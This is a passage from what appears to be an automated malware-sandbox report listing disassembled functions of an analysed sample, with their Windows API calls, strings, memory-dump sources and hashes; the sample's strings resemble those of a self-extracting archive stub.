                                                                                                  • Instruction Fuzzy Hash: D7F03032108028BFCF266F51EC09ECE7F26EB85770B12C415F65A5B061CB72DAA5DAD0
                                                                                                  Function 00928900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 0092891E
                                                                                                    • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
                                                                                                    • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
                                                                                                  • _free.LIBCMT ref: 00928930
                                                                                                  • _free.LIBCMT ref: 00928943
                                                                                                  • _free.LIBCMT ref: 00928954
                                                                                                  • _free.LIBCMT ref: 00928965
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 7dbeb2b03ea0a1ac4162e6809531b739ee7c58ac04e62a86a1a2ab31b40936ce
                                                                                                  • Instruction ID: e6232b289d740d09096acf352f5f8ccdc6efa713fb4eaff59caff1bb8f523213
                                                                                                  • Opcode Fuzzy Hash: 7dbeb2b03ea0a1ac4162e6809531b739ee7c58ac04e62a86a1a2ab31b40936ce
                                                                                                  • Instruction Fuzzy Hash: 47F05E7583AA328BD61A6F14FC0660A3FB5F724710700090EF024922F9CBB94959FF81
                                                                                                  Function 009115FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf
                                                                                                  • String ID: %ls$%s: %s
                                                                                                  • API String ID: 589789837-2259941744
                                                                                                  • Opcode ID: a48e889d572240c306c157aa875fc5fee563ac91549dccf1d20619817d7aa509
                                                                                                  • Instruction ID: 1540fb88f353aabbf9eeccf7fced555debc07fc8ea48e63f4f8211ff20e77394
                                                                                                  • Opcode Fuzzy Hash: a48e889d572240c306c157aa875fc5fee563ac91549dccf1d20619817d7aa509
                                                                                                  • Instruction Fuzzy Hash: FE51FA3538830CFAF7211A908D46FF57269AB45B44F24CD87F386644E1DAA7A4D0AB1F
                                                                                                  Function 009231D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 009231FB
                                                                                                  • _abort.LIBCMT ref: 00923306
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer_abort
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 948111806-2084237596
                                                                                                  • Opcode ID: cb857d34d9297a00ed5f7fc3dccdcc8bab0174c56f2dc077d6472071907b150e
                                                                                                  • Instruction ID: 82d7b534f6c7706cae5f8da3e91278a7ce2df3fde2a03d4eb61d849da5c7f596
                                                                                                  • Opcode Fuzzy Hash: cb857d34d9297a00ed5f7fc3dccdcc8bab0174c56f2dc077d6472071907b150e
                                                                                                  • Instruction Fuzzy Hash: 70415971900229EFCF16DF94EC81AAEBBB9BF48304F148159F91467259D339AA50DB50
                                                                                                  Function 00907401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00907406
                                                                                                    • Part of subcall function 00903BBA: __EH_prolog.LIBCMT ref: 00903BBF
                                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 009074CD
                                                                                                    • Part of subcall function 00907A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00907AAB
                                                                                                    • Part of subcall function 00907A9C: GetLastError.KERNEL32 ref: 00907AF1
                                                                                                    • Part of subcall function 00907A9C: CloseHandle.KERNEL32(?), ref: 00907B00
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                  • API String ID: 3813983858-639343689
                                                                                                  • Opcode ID: 04fd13159df569d64b51cd06d0983ef767ebb0ac0915cf1973e19e77669f7868
                                                                                                  • Instruction ID: b5d67db3c9cc7ad10a6100b86e76f933a3a207b793220b952d2f23ac1a34b888
                                                                                                  • Opcode Fuzzy Hash: 04fd13159df569d64b51cd06d0983ef767ebb0ac0915cf1973e19e77669f7868
                                                                                                  • Instruction Fuzzy Hash: 8731A171E04258AEDF11EBE49C45FEEBBBDAF85324F048015F805A72D2C7749A84CB61
                                                                                                  Function 0091AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091AD98
                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0091ADAD
                                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0091ADC2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                  • String ID: ASKNEXTVOL
                                                                                                  • API String ID: 445417207-3402441367
                                                                                                  • Opcode ID: ffcc18616b73378bcc8f5b06d7577ff27b5bee4a3f7d657cea66848d0cdcf017
                                                                                                  • Instruction ID: 2ce18fe26950140430847fb8c34a55de1f7de6c2e192dbd33a7185971345c029
                                                                                                  • Opcode Fuzzy Hash: ffcc18616b73378bcc8f5b06d7577ff27b5bee4a3f7d657cea66848d0cdcf017
                                                                                                  • Instruction Fuzzy Hash: AC11D336349604BFD3128F68EC45FEA37ADEB4B702F044408F241DB4E4C7A69D85A722
                                                                                                  Function 0090D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __fprintf_l.LIBCMT ref: 0090D954
                                                                                                  • _strncpy.LIBCMT ref: 0090D99A
                                                                                                    • Part of subcall function 00911DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00941030,00000200,0090D928,00000000,?,00000050,00941030), ref: 00911DC4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                  • String ID: $%s$@%s
                                                                                                  • API String ID: 562999700-834177443
                                                                                                  • Opcode ID: a4c994f6bb421729233d2f03f407bf9dc28bfda51f5d4265b177995aabca8065
                                                                                                  • Instruction ID: 8a7e784fc9d11dd529896ee335e119d15b8454b1b7936b618ba03885e355d2da
                                                                                                  • Opcode Fuzzy Hash: a4c994f6bb421729233d2f03f407bf9dc28bfda51f5d4265b177995aabca8065
                                                                                                  • Instruction Fuzzy Hash: 3621AF7654224CAEEF20EEE8CC01FEE7BACAF45704F044422F920961E2E272D648CF51
                                                                                                  Function 00910E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0090AC5A,00000008,?,00000000,?,0090D22D,?,00000000), ref: 00910E85
                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0090AC5A,00000008,?,00000000,?,0090D22D,?,00000000), ref: 00910E8F
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0090AC5A,00000008,?,00000000,?,0090D22D,?,00000000), ref: 00910E9F
                                                                                                  Strings
                                                                                                  • Thread pool initialization failed., xrefs: 00910EB7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                  • String ID: Thread pool initialization failed.
                                                                                                  • API String ID: 3340455307-2182114853
                                                                                                  • Opcode ID: cd3b22e093cf50286d8bcb7402816e0d4072de7376cc41667865ee98da839c70
                                                                                                  • Instruction ID: 34e9e7a15a571a30709ed1a267bbd0e0e310dddbe5394bbf5bbbccf1ed862f2d
                                                                                                  • Opcode Fuzzy Hash: cd3b22e093cf50286d8bcb7402816e0d4072de7376cc41667865ee98da839c70
                                                                                                  • Instruction Fuzzy Hash: 23118FB16447089FD3215F669C84AA7FBECEB94744F14482EE1DAC2200D6B259809B50
                                                                                                  Function 0091B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091B2BE
                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0091B2D6
                                                                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0091B304
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                  • String ID: GETPASSWORD1
                                                                                                  • API String ID: 445417207-3292211884
                                                                                                  • Opcode ID: dbb5520a21ceadd10355f5e2302cceddbe97951e68e37e1f35e86f6db82faec2
                                                                                                  • Instruction ID: e38c8d37bf77623aad189ec1c6176138a60fa39ee49c42a830bc18c86ac1f928
                                                                                                  • Opcode Fuzzy Hash: dbb5520a21ceadd10355f5e2302cceddbe97951e68e37e1f35e86f6db82faec2
                                                                                                  • Instruction Fuzzy Hash: 52110432A0411CBADB219A649D59FFF376DEF5A700F000824FA55F20C0C7B5AA999761
                                                                                                  Function 0091DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                  • API String ID: 0-56093855
                                                                                                  • Opcode ID: 5a0e62c3f88a3bcd51f0295ac68681d6c6e841c9b6297dcb1d270daebcf4717c
                                                                                                  • Instruction ID: 9357014f0315ad1a546bd528a7359bcc088f9c306de4fb73fb3a4c6b47a2b804
                                                                                                  • Opcode Fuzzy Hash: 5a0e62c3f88a3bcd51f0295ac68681d6c6e841c9b6297dcb1d270daebcf4717c
                                                                                                  • Instruction Fuzzy Hash: ED019E7EB29249AFC7219F54FC04DDB3BA9E74A354B00042AF905926B0C6319890FBA0
                                                                                                  Function 00929A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1036877536-0
                                                                                                  • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                  • Instruction ID: da5d6ec90517256279edded407c6ab9aa6211546402c608a1452c258b27257b3
                                                                                                  • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                  • Instruction Fuzzy Hash: ACA15A72E043A69FEB25CF28E8917AEBBE9EF55310F18456DE4899B385C3388D41C750
                                                                                                  Function 0090A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00907F69,?,?,?), ref: 0090A3FA
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00907F69,?), ref: 0090A43E
                                                                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00907F69,?,?,?,?,?,?,?), ref: 0090A4BF
                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000800,?,00907F69,?,?,?,?,?,?,?,?,?,?), ref: 0090A4C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Create$CloseHandleTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 2287278272-0
                                                                                                  • Opcode ID: 51cf432c8e865de9edd32d1f2285efd0d112abb8f259272d0d7a84534a4cebc9
                                                                                                  • Instruction ID: 896f4d09d3fb08dfc6b2ddd32ac6f5625a31f269888b5021e982bee4f455b38e
                                                                                                  • Opcode Fuzzy Hash: 51cf432c8e865de9edd32d1f2285efd0d112abb8f259272d0d7a84534a4cebc9
                                                                                                  • Instruction Fuzzy Hash: 87418C31288381AEE721DF24DC45BEEBBE8AB85700F044919B6E1D71D1D6A49A489B93
                                                                                                  Function 00901100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 176396367-0
                                                                                                  • Opcode ID: 9fa8675f0ca0d430c6867806173b48de0a7fd3416e6cfc1727dcedf91f568b8c
                                                                                                  • Instruction ID: cc6a6c14aa35f8e6437033f3545691e119b7286eaca48a1838d2b5dda3d07a5e
                                                                                                  • Opcode Fuzzy Hash: 9fa8675f0ca0d430c6867806173b48de0a7fd3416e6cfc1727dcedf91f568b8c
                                                                                                  • Instruction Fuzzy Hash: 7041C771A006699FCB259F688C05AEF7BBCEF41310F004119FD45F7245DB74AE998BA4
                                                                                                  Function 0092C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,009291E0,?,00000000,?,00000001,?,?,00000001,009291E0,?), ref: 0092C9D5
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0092CA5E
                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00926CBE,?), ref: 0092CA70
                                                                                                  • __freea.LIBCMT ref: 0092CA79
                                                                                                    • Part of subcall function 00928E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                  • String ID:
                                                                                                  • API String ID: 2652629310-0
                                                                                                  • Opcode ID: b6eeb14661248b5c55fe1fbcdf2ec818ac179152cdcb5a5b17634dad50f7c87e
                                                                                                  • Instruction ID: b2ea827b7812cf799655839692fe563ca7d3aa76354c98b7b61f1b865cb9f660
                                                                                                  • Opcode Fuzzy Hash: b6eeb14661248b5c55fe1fbcdf2ec818ac179152cdcb5a5b17634dad50f7c87e
                                                                                                  • Instruction Fuzzy Hash: EE31B0B2A1022AABDF24DF64EC51EBE7BA9EF41710B044268FC04E7254E735DD54DB90
                                                                                                  Function 0091A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDC.USER32(00000000), ref: 0091A666
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0091A675
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0091A683
                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0091A691
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsDevice$Release
                                                                                                  • String ID:
